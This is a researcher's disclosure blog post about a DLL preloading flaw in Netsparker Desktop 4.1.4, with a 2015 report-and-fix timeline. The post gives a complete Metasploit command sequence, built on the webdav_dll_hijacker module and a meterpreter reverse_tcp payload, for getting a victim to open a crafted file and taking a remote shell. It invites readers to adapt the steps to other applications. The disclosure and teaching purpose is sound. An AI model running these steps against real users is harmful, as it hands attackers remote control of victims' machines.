DLL Preloading Strikes again, Netsparker (v4.1.4)

DLL Preloading Strikes again, Netsparker (v4.1.4)

First things first, go update netsparker desktop to the latest version, with some new features and some fixes

The more you look, the more opportunities you give yourself to find things.


I was having a little bit of a back and fourth with some appsec peers on twitter and I thought I would revisit netsparker to review it for myself (something I still haven't done properly even after this post).

You can have a trial

Wicked, I have a trial.

Whenever I see an application loading a filetype registered to the application in question, especially if the executable runs from a location like Desktop or Downloads or Sam's mum's house (i.e. not installed to Program Files*) ...If I have time to bust out metasploit and check for DLL preloading I will. It's reasonably common and the biggest names in the world still get hit with it on a regular basis, infact I've disclosed to Lenovo's software and I'm sure there are some in PowerDVD ... and last week some in Office! it's common.

How to test for DLL Preloading with metasploit:

In your MSF Console use the following commands to prepare Metasploit

What we are looking to pick on is the .ndb, .nss file types in a bid to see if they look for DLL files in the folder they reside in (Windows 10 64bit fully patched)the .ndb I guess is a 'NetsparkerDataBase' and .nss 'Netsparker State Save' (?)

Many thanks to the chap's at Rapid7 for this module - but if you are targeting a specific application specifically, it might be a timesaver to only look at the applications supported filetypes.

You can use/replicate these steps for testing other filetypes in applications, you will have to change the set EXTENSIONS to the filetype you are testing your self.

use exploit/windows/browser/webdav_dll_hijacker
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 24969
set EXTENSIONS ndb,nss
set BASENAME FileName
set ExitOnSession false
set SRVPORT 80
set SHARENAME ScanResults
set DisablePayloadHandler false
exploit -j

Once you have loaded that lot up, all you need to do now is either have your victim try to load up the 'ndb' file or if you have some kind of access to the box you can click it your self insert scenario here

You or your victim will see nothing suspicious...

The file will fail to load

You will see meterpreter wake up

And you're in - Enjoy!

If you would like to see a visual guide to exploiting this vulnerability by way of Metasploit & Armitage check out the 'john isn't that good at screen casting yet' video below link.

Better at full screen

So, if you want to exploit netsparker you are going to need a version 4.1.4 or lower... If you have an older version everyone that loves you recommend that you update it.

Issue identified and reported to netsparker 09/10/2015
acknowledged same day
verbal fix ready for next release
Initial Fix ready as of 04/11/2015 [held back]
new version released 17/12/2015 [changelog]

Happy hunting.